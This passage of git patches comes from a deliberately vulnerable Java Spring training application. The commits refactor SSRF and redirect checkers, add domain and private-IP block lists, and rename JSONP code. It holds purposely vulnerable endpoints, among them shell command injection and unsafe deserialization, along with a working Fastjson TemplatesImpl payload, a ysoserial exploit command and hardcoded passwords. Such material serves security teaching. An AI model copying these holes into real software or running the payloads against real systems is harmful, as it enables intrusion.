             URI uri = new URI(url);
             String host = uri.getHost().toLowerCase();
@@ -38,6 +41,16 @@ public static String checkURL(String url) {
                 return null;
             }
 
+            // 如果满足黑名单返回null
+            if (blockDomains.contains(host)){
+                return null;
+            }
+            for(String blockDomain: blockDomains) {
+                if(host.endsWith("." + blockDomain)) {
+                    return null;
+                }
+            }
+
             // 支持多级域名
             if (safeDomains.contains(host)){
                 return url;
@@ -56,39 +69,55 @@ public static String checkURL(String url) {
         }
     }
 
+
+    /**
+     * 通过自定义白名单域名处理SSRF漏洞。如果URL范围收敛，强烈建议使用该方案。
+     * 这是最简单也最有效的修复方式。因为SSRF都是发起URL请求时造成，大多数场景是图片场景，一般图片的域名都是CDN或者OSS等，所以限定域名白名单即可完成SSRF漏洞修复。
+     *
+     * @author JoyChou @ 2020-03-30
+     * @param url 需要校验的url
+     * @return Safe url returns true. Dangerous url returns false.
+     */
+    public static boolean checkSSRFByWhitehosts(String url) {
+        return SSRFChecker.checkURLFckSSRF(url);
+    }
+
+
     /**
-     * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
+     * 解析URL的IP，判断IP是否是内网IP。如果有重定向跳转，循环解析重定向跳转的IP。不建议使用该方案。
+     *
+     * 存在的问题：
+     *   1、会主动发起请求，可能会有性能问题
+     *   2、设置重定向跳转为第一次302不跳转，第二次302跳转到内网IP 即可绕过该防御方案
+     *   3、TTL设置为0会被绕过
      *
      * @param url check的url
      * @return 安全返回true，危险返回false
      */
-    public static Boolean checkSSRF(String url) {
+    @Deprecated
+    public static boolean checkSSRF(String url) {
         int checkTimes = 10;
         return SSRFChecker.checkSSRF(url, checkTimes);
     }
 
 
     /**
-     * Suitable for: TTL isn't set to 0 & Redirect is forbidden.
+     * 不能使用白名单的情况下建议使用该方案。前提是禁用重定向并且TTL默认不为0。
+     *
+     * 存在问题：
+     *  1、TTL为0会被绕过
+     *  2、使用重定向可绕过
      *
      * @param url The url that needs to check.
      * @return Safe url returns true. Dangerous url returns false.
      */
     public static boolean checkSSRFWithoutRedirect(String url) {
+        if(url == null) {
+            return false;
+        }
         return !SSRFChecker.isInnerIPByUrl(url);
     }
 
-    /**
-     * Check SSRF by host white list.
-     * This is the simplest and most effective method to fix ssrf vul.
-     *
-     * @param url The url that needs to check.
-     * @param hostWlist host whitelist
-     * @return Safe url returns url. Dangerous url returns null.
-     */
-    public static String checkSSRFByHost(String url) {
-        return checkURL(url);
-    }
 
     /**
      * Filter file path to prevent path traversal vulns.
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index a9787aac..dab5368a 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -1,5 +1,6 @@
 package org.joychou.security;
 
+import org.joychou.interceptor.JsonpInterceptor;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.context.annotation.Bean;
@@ -13,6 +14,7 @@
 import org.springframework.web.cors.CorsConfiguration;
 import org.springframework.web.cors.CorsConfigurationSource;
 import org.springframework.web.cors.UrlBasedCorsConfigurationSource;
+import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
 
 import javax.servlet.http.HttpServletRequest;
 import java.util.ArrayList;
@@ -105,7 +107,6 @@ public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception
                 .withUser("joychou").password("joychou123").roles("USER").and()
                 .withUser("admin").password("admin123").roles("USER", "ADMIN");
     }
-
 }
 
 
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index c6b2a184..8b72592e 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -35,6 +35,5 @@ joychou.security.csrf.method = POST
 ### jsonp configuration begins ###  # auto convert json to jsonp
 # referer check
 joychou.security.jsonp.referer.check.enabled = true
-joychou.security.jsonp.referer.host = joychou.org, joychou.com
 joychou.security.jsonp.callback = callback, _callback
 ### jsonp configuration ends ###
\ No newline at end of file
diff --git a/src/main/resources/banner.txt b/src/main/resources/banner.txt
new file mode 100644
index 00000000..45e1698c
--- /dev/null
+++ b/src/main/resources/banner.txt
@@ -0,0 +1,6 @@
+     ____.                       _________               _________            .___
+    |    |____ ___  _______     /   _____/ ____   ____   \_   ___ \  ____   __| _/____
+    |    \__  \\  \/ /\__  \    \_____  \_/ __ \_/ ___\  /    \  \/ /  _ \ / __ |/ __ \
+/\__|    |/ __ \\   /  / __ \_  /        \  ___/\  \___  \     \___(  <_> ) /_/ \  ___/
+\________(____  /\_/  (____  / /_______  /\___  >\___  >  \______  /\____/\____ |\___  >
+              \/           \/          \/     \/     \/          \/            \/    \/
\ No newline at end of file
diff --git a/src/main/resources/url/safe_domain.xml b/src/main/resources/url/safe_domain.xml
deleted file mode 100644
index a403a675..00000000
--- a/src/main/resources/url/safe_domain.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-
-<safedomain>
-    <!-- 支持一级域名或多级域名 -->
-    <domain>joychou.com</domain>
-    <domain>test.joychou.org</domain>
-</safedomain>
diff --git a/src/main/resources/url/ssrf_safe_domain.xml b/src/main/resources/url/ssrf_safe_domain.xml
new file mode 100644
index 00000000..eb5e4c44
--- /dev/null
+++ b/src/main/resources/url/ssrf_safe_domain.xml
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<ssrfsafeconfig>
+
+    <!-- 域名支持一级或者多级，如果在白名单。SecurityUtil.checkSSRFByWhitehosts()方法的域名配置 -->
+    <safedomains>
+        <domain>img.alicdn.com</domain>
+    </safedomains>
+
+    <blockips>
+        <ip>10.0.0.0/8</ip>
+        <ip>172.16.0.0/12</ip>
+        <ip>192.168.0.0/16</ip>
+        <ip>127.0.0.0/8</ip>
+        <ip>0.0.0.0/32</ip>
+    </blockips>
+
+    <blockdomains>
+        <domain>joychou-inc.com</domain>
+    </blockdomains>
+
+</ssrfsafeconfig>
diff --git a/src/main/resources/url/url_safe_domain.xml b/src/main/resources/url/url_safe_domain.xml
new file mode 100644
index 00000000..ee81efcf
--- /dev/null
+++ b/src/main/resources/url/url_safe_domain.xml
@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<domains>
+    <safedomains>
+        <!-- 支持一级域名或多级域名 -->
+        <domain>joychou.com</domain>
+        <domain>joychou.org</domain>
+        <domain>test.joychou.org</domain>
+        <domain>localhost</domain>
+    </safedomains>
+
+    <!-- 支持一级域名或多级域名 -->
+    <blockdomains>
+        <domain>baidu.com</domain>
+        <domain>evil.joychou.org</domain>
+    </blockdomains>
+
+</domains>

From 039d0f12cf9f50e27e0061711f33d3da01ca1113 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 31 Mar 2020 18:11:43 +0800
Subject: [PATCH 075/108] bug fix

---
 .../joychou/interceptor/JsonpInterceptor.java | 40 -------------------
 .../org/joychou/security/SecurityUtil.java    |  2 +-
 .../joychou/security/WebSecurityConfig.java   |  4 +-
 3 files changed, 2 insertions(+), 44 deletions(-)
 delete mode 100644 src/main/java/org/joychou/interceptor/JsonpInterceptor.java

diff --git a/src/main/java/org/joychou/interceptor/JsonpInterceptor.java b/src/main/java/org/joychou/interceptor/JsonpInterceptor.java
deleted file mode 100644
index 52d67e4c..00000000
--- a/src/main/java/org/joychou/interceptor/JsonpInterceptor.java
+++ /dev/null
@@ -1,40 +0,0 @@
-package org.joychou.interceptor;
-
-import org.apache.commons.lang.StringUtils;
-import org.joychou.config.WebConfig;
-import org.slf4j.Logger;
-import org.slf4j.LoggerFactory;
-import org.springframework.web.servlet.HandlerInterceptor;
-import org.springframework.web.servlet.ModelAndView;
-
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
-
-/**
- * @author JoyChou @ 2020-03-28
- * 专门为object自动转jsonp功能配置的Referer校验Intercepter
- */
-
-public class JsonpInterceptor implements HandlerInterceptor {
-
-    private final Logger logger= LoggerFactory.getLogger(this.getClass());
-
-    @Override
-    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
-            throws Exception {
-        return true;
-    }
-
-    @Override
-    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler,
-                           ModelAndView modelAndView) throws Exception {
-    }
-
-    @Override
-    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex)
-            throws Exception {
-        logger.info(response.getWriter().toString());
-    }
-
-}
-
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 0c6cb757..14cc397f 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -17,7 +17,7 @@ public class SecurityUtil {
     private static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
 
     /**
-     * 同时支持一级域名和多级域名，相关配置在resources目录下url/safe_domain.xml文件。
+     * 同时支持一级域名和多级域名，相关配置在resources目录下url/url_safe_domain.xml文件。
      * 优先判断黑名单，如果满足黑名单return null。
      *
      * @param url the url need to check
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index dab5368a..5e8c3697 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -1,6 +1,5 @@
 package org.joychou.security;
 
-import org.joychou.interceptor.JsonpInterceptor;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.context.annotation.Bean;
@@ -14,7 +13,6 @@
 import org.springframework.web.cors.CorsConfiguration;
 import org.springframework.web.cors.CorsConfigurationSource;
 import org.springframework.web.cors.UrlBasedCorsConfigurationSource;
-import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
 
 import javax.servlet.http.HttpServletRequest;
 import java.util.ArrayList;
@@ -39,7 +37,7 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
     @Value("${joychou.security.csrf.method}")
     private String[] csrfMethod = {"POST"};
 
-    RequestMatcher csrfRequestMatcher = new RequestMatcher() {
+    private RequestMatcher csrfRequestMatcher = new RequestMatcher() {
 
         @Override
         public boolean matches(HttpServletRequest request) {

From 33748f31054535fed0c3ae42ca23fde31b5b3404 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 3 Apr 2020 10:23:40 +0800
Subject: [PATCH 076/108] bug fix

---
 README.md                                     |  3 +-
 .../java/org/joychou/config/Constants.java    |  8 +++++
 .../org/joychou/controller/CRLFInjection.java |  9 +++--
 .../org/joychou/controller/CommandInject.java |  4 +--
 .../java/org/joychou/controller/Cookies.java  | 12 +++----
 .../java/org/joychou/controller/Cors.java     |  4 +--
 .../org/joychou/controller/Deserialize.java   | 10 +++---
 .../java/org/joychou/controller/Fastjson.java |  2 +-
 .../{jsonp/JSONP.java => Jsonp.java}          | 35 ++++++-------------
 .../org/joychou/controller/URLRedirect.java   |  4 +--
 .../Object2Jsonp.java}                        |  7 ++--
 .../org/joychou/security/SSRFChecker.java     |  3 +-
 .../java/org/joychou/util/LoginUtils.java     | 21 +++++++++++
 13 files changed, 68 insertions(+), 54 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/Constants.java
 rename src/main/java/org/joychou/controller/{jsonp/JSONP.java => Jsonp.java} (76%)
 rename src/main/java/org/joychou/{controller/jsonp/JSONPAdvice.java => security/Object2Jsonp.java} (93%)
 create mode 100644 src/main/java/org/joychou/util/LoginUtils.java

diff --git a/README.md b/README.md
index 5799c51b..9ee7a881 100644
--- a/README.md
+++ b/README.md
@@ -33,9 +33,10 @@ Sort by letter.
 - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
+- [GetRequestURI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/GetRequestURI.java)
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
-- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jsonp.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
diff --git a/src/main/java/org/joychou/config/Constants.java b/src/main/java/org/joychou/config/Constants.java
new file mode 100644
index 00000000..62379458
--- /dev/null
+++ b/src/main/java/org/joychou/config/Constants.java
@@ -0,0 +1,8 @@
+package org.joychou.config;
+
+public class Constants {
+
+    private Constants(){}
+
+    public static final String REMEMBER_ME_COOKIE = "rememberMe";
+}
diff --git a/src/main/java/org/joychou/controller/CRLFInjection.java b/src/main/java/org/joychou/controller/CRLFInjection.java
index b0e9af4c..4fb66ba7 100644
--- a/src/main/java/org/joychou/controller/CRLFInjection.java
+++ b/src/main/java/org/joychou/controller/CRLFInjection.java
@@ -9,18 +9,17 @@
 import javax.servlet.http.HttpServletResponse;
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018.01.03
- * @desc    Java 1.7/1.8 no CRLF vuls (test in Java 1.7/1.8)
+ * Java 1.7/1.8 no CRLF vulns (test in Java 1.7/1.8)
+ *
+ * @author  JoyChou (joychou@joychou.org) @2018-01-03
  */
-
 @Controller
 @RequestMapping("/crlf")
 public class CRLFInjection {
 
     @RequestMapping("/safecode")
     @ResponseBody
-    private static void crlf(HttpServletRequest request, HttpServletResponse response) {
+    public void crlf(HttpServletRequest request, HttpServletResponse response) {
         response.addHeader("test1", request.getParameter("test1"));
         response.setHeader("test2", request.getParameter("test2"));
         String author = request.getParameter("test3");
diff --git a/src/main/java/org/joychou/controller/CommandInject.java b/src/main/java/org/joychou/controller/CommandInject.java
index f4901b87..5b63efcf 100644
--- a/src/main/java/org/joychou/controller/CommandInject.java
+++ b/src/main/java/org/joychou/controller/CommandInject.java
@@ -22,7 +22,7 @@ public class CommandInject {
      * @return result
      */
     @GetMapping("/codeinject")
-    public static String codeInject(String filepath) throws IOException {
+    public String codeInject(String filepath) throws IOException {
 
         String[] cmdList = new String[]{"sh", "-c", "ls -la " + filepath};
         ProcessBuilder builder = new ProcessBuilder(cmdList);
@@ -50,7 +50,7 @@ public String codeInjectHost(HttpServletRequest request) throws IOException {
     }
 
     @GetMapping("/codeinject/sec")
-    public static String codeInjectSec(String filepath) throws IOException {
+    public String codeInjectSec(String filepath) throws IOException {
         String filterFilePath = SecurityUtil.cmdFilter(filepath);
         if (null == filterFilePath) {
             return "Bad boy. I got u.";
diff --git a/src/main/java/org/joychou/controller/Cookies.java b/src/main/java/org/joychou/controller/Cookies.java
index 5a32b191..e498dfc6 100644
--- a/src/main/java/org/joychou/controller/Cookies.java
+++ b/src/main/java/org/joychou/controller/Cookies.java
@@ -16,14 +16,14 @@ public class Cookies {
     private static String NICK = "nick";
 
     @RequestMapping(value = "/vuln01")
-    private String vuln01(HttpServletRequest req) {
+    public String vuln01(HttpServletRequest req) {
         String nick = WebUtils.getCookieValueByName(req, NICK); // key code
         return "Cookie nick: " + nick;
     }
 
 
     @RequestMapping(value = "/vuln02")
-    private String vuln02(HttpServletRequest req) {
+    public String vuln02(HttpServletRequest req) {
         String nick = null;
         Cookie[] cookie = req.getCookies();
 
@@ -36,7 +36,7 @@ private String vuln02(HttpServletRequest req) {
 
 
     @RequestMapping(value = "/vuln03")
-    private String vuln03(HttpServletRequest req) {
+    public String vuln03(HttpServletRequest req) {
         String nick = null;
         Cookie cookies[] = req.getCookies();
         if (cookies != null) {
@@ -52,7 +52,7 @@ private String vuln03(HttpServletRequest req) {
 
 
     @RequestMapping(value = "/vuln04")
-    private String vuln04(HttpServletRequest req) {
+    public String vuln04(HttpServletRequest req) {
         String nick = null;
         Cookie cookies[] = req.getCookies();
         if (cookies != null) {
@@ -68,13 +68,13 @@ private String vuln04(HttpServletRequest req) {
 
 
     @RequestMapping(value = "/vuln05")
-    private String vuln05(@CookieValue("nick") String nick) {
+    public String vuln05(@CookieValue("nick") String nick) {
         return "Cookie nick: " + nick;
     }
 
 
     @RequestMapping(value = "/vuln06")
-    private String vuln06(@CookieValue(value = "nick") String nick) {
+    public String vuln06(@CookieValue(value = "nick") String nick) {
         return "Cookie nick: " + nick;
     }
 
diff --git a/src/main/java/org/joychou/controller/Cors.java b/src/main/java/org/joychou/controller/Cors.java
index 3537ecf8..109a4e18 100644
--- a/src/main/java/org/joychou/controller/Cors.java
+++ b/src/main/java/org/joychou/controller/Cors.java
@@ -1,10 +1,10 @@
 package org.joychou.controller;
 
 import org.joychou.security.SecurityUtil;
+import org.joychou.util.LoginUtils;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.CrossOrigin;
 import org.springframework.web.bind.annotation.RequestMapping;
-import org.joychou.controller.jsonp.JSONP;
 import org.springframework.web.bind.annotation.RestController;
 
 import javax.servlet.http.HttpServletRequest;
@@ -111,7 +111,7 @@ public String seccode(HttpServletRequest request, HttpServletResponse response)
         }
         response.setHeader("Access-Control-Allow-Origin", origin);
         response.setHeader("Access-Control-Allow-Credentials", "true");
-        return JSONP.getUserInfo2JsonStr(request);
+        return LoginUtils.getUserInfo2JsonStr(request);
     }
 
 
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 57e0a6b7..e3e0bca6 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import org.joychou.config.Constants;
 import org.joychou.security.AntObjectInputStream;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
@@ -25,20 +26,19 @@
 @RequestMapping("/deserialize")
 public class Deserialize {
 
-    private static String cookieName = "rememberMe";
     protected final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     /**
      * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
      * Add the result to rememberMe cookie.
      *
-     * http://localhost:8080/deserialize/rememberMe/vul
+     * http://localhost:8080/deserialize/rememberMe/vuln
      */
-    @RequestMapping("/rememberMe/vul")
+    @RequestMapping("/rememberMe/vuln")
     public String rememberMeVul(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
-        Cookie cookie = getCookie(request, cookieName);
+        Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
 
         if (null == cookie){
             return "No rememberMe cookie. Right?";
@@ -64,7 +64,7 @@ public String rememberMeVul(HttpServletRequest request)
     public String rememberMeBlackClassCheck(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
-        Cookie cookie = getCookie(request, cookieName);
+        Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
 
         if (null == cookie){
             return "No rememberMe cookie. Right?";
diff --git a/src/main/java/org/joychou/controller/Fastjson.java b/src/main/java/org/joychou/controller/Fastjson.java
index 684ee253..80d06fc9 100644
--- a/src/main/java/org/joychou/controller/Fastjson.java
+++ b/src/main/java/org/joychou/controller/Fastjson.java
@@ -3,6 +3,7 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 import com.alibaba.fastjson.parser.Feature;
+import com.alibaba.fastjson.parser.ParserConfig;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -31,7 +32,6 @@ public static String Deserialize(@RequestBody String params) {
     }
 
     public static void main(String[] args) {
-
         // Open calc in mac
         String payload = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \"_bytecodes\": [\"yv66vgAAADEAOAoAAwAiBwA2BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQAzTG1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAhFeHAuamF2YQwACgALBwAoAQAxbWUvbGlnaHRsZXNzL2Zhc3Rqc29uL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAHW1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQASb3BlbiAtYSBDYWxjdWxhdG9yCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA9saWdodGxlc3MvcHduZXIBABFMbGlnaHRsZXNzL3B3bmVyOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwA3AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAAD8ADgAAACAAAwAAAAEADwA3AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAAEIADgAAACoABAAAAAEADwA3AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAABsAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAAAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==\"], \"_name\": \"lightless\", \"_tfactory\": { }, \"_outputProperties\":{ }}";
         JSONObject object = JSON.parseObject(payload, Feature.SupportNonPublicField);
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/Jsonp.java
similarity index 76%
rename from src/main/java/org/joychou/controller/jsonp/JSONP.java
rename to src/main/java/org/joychou/controller/Jsonp.java
index e2dfc8eb..44394097 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/Jsonp.java
@@ -1,10 +1,10 @@
-package org.joychou.controller.jsonp;
+package org.joychou.controller;
 
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 
-import com.netflix.ribbon.proxy.annotation.Http;
 import org.joychou.security.SecurityUtil;
+import org.joychou.util.LoginUtils;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.*;
@@ -15,8 +15,7 @@
 
 import javax.servlet.http.HttpServletRequest;
 import java.security.Principal;
-import java.util.HashMap;
-import java.util.Map;
+
 
 
 /**
@@ -26,22 +25,10 @@
 
 @RestController
 @RequestMapping("/jsonp")
-public class JSONP {
+public class Jsonp {
 
     private String callback = WebConfig.getBusinessCallback();
 
-    // get current login username
-    public static String getUserInfo2JsonStr(HttpServletRequest request) {
-        Principal principal = request.getUserPrincipal();
-
-        String username = principal.getName();
-
-        Map<String, String> m = new HashMap<>();
-        m.put("Username", username);
-
-        return JSON.toJSONString(m);
-    }
-
     /**
      * Set the response content-type to application/javascript.
      * <p>
@@ -50,7 +37,7 @@ public static String getUserInfo2JsonStr(HttpServletRequest request) {
     @RequestMapping(value = "/vuln/referer", produces = "application/javascript")
     public String referer(HttpServletRequest request) {
         String callback = request.getParameter(this.callback);
-        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
+        return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
     /**
@@ -67,20 +54,20 @@ public String emptyReferer(HttpServletRequest request) {
             return "error";
         }
         String callback = request.getParameter(this.callback);
-        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
+        return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
     /**
      * Adding callback or cback on parameter can automatically return jsonp data.
-     * http://localhost:8080/jsonp/vuln/advice?callback=test
-     * http://localhost:8080/jsonp/vuln/advice?_callback=test
+     * http://localhost:8080/jsonp/object2jsonp?callback=test
+     * http://localhost:8080/jsonp/object2jsonp?_callback=test
      *
      * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully.
      * Such as JSONOjbect or JavaBean. String type cannot be used.
      */
-    @RequestMapping(value = "/vuln/advice", produces = MediaType.APPLICATION_JSON_VALUE)
+    @RequestMapping(value = "/object2jsonp", produces = MediaType.APPLICATION_JSON_VALUE)
     public JSONObject advice(HttpServletRequest request) {
-        return JSON.parseObject(getUserInfo2JsonStr(request));
+        return JSON.parseObject(LoginUtils.getUserInfo2JsonStr(request));
     }
 
 
@@ -112,7 +99,7 @@ public String safecode(HttpServletRequest request) {
             return "error";
         }
         String callback = request.getParameter(this.callback);
-        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
+        return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
 
diff --git a/src/main/java/org/joychou/controller/URLRedirect.java b/src/main/java/org/joychou/controller/URLRedirect.java
index d2b3b484..d16f0ebb 100644
--- a/src/main/java/org/joychou/controller/URLRedirect.java
+++ b/src/main/java/org/joychou/controller/URLRedirect.java
@@ -83,8 +83,8 @@ public void sendRedirect_seccode(HttpServletRequest request, HttpServletResponse
             throws IOException{
         String url = request.getParameter("url");
         if (SecurityUtil.checkURL(url) == null) {
-            // Redirect to error page.
-            response.sendRedirect("https://test.joychou.org/error3.html");
+            response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+            response.getWriter().write("url forbidden");
             return;
         }
         response.sendRedirect(url);
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/security/Object2Jsonp.java
similarity index 93%
rename from src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
rename to src/main/java/org/joychou/security/Object2Jsonp.java
index 944a325b..6432616b 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
+++ b/src/main/java/org/joychou/security/Object2Jsonp.java
@@ -1,8 +1,7 @@
-package org.joychou.controller.jsonp;
+package org.joychou.security;
 
 import org.apache.commons.lang.StringUtils;
 import org.joychou.config.WebConfig;
-import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.annotation.Value;
@@ -25,14 +24,14 @@
  * Since Spring Framework 4.1. Springboot 2.1.0 RELEASE use spring framework 5.1.2
  */
 @ControllerAdvice
-public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice {
+public class Object2Jsonp extends AbstractJsonpResponseBodyAdvice {
 
     private final String[] callbacks;
     private final Logger logger= LoggerFactory.getLogger(this.getClass());
 
 
     // method of using @Value in constructor
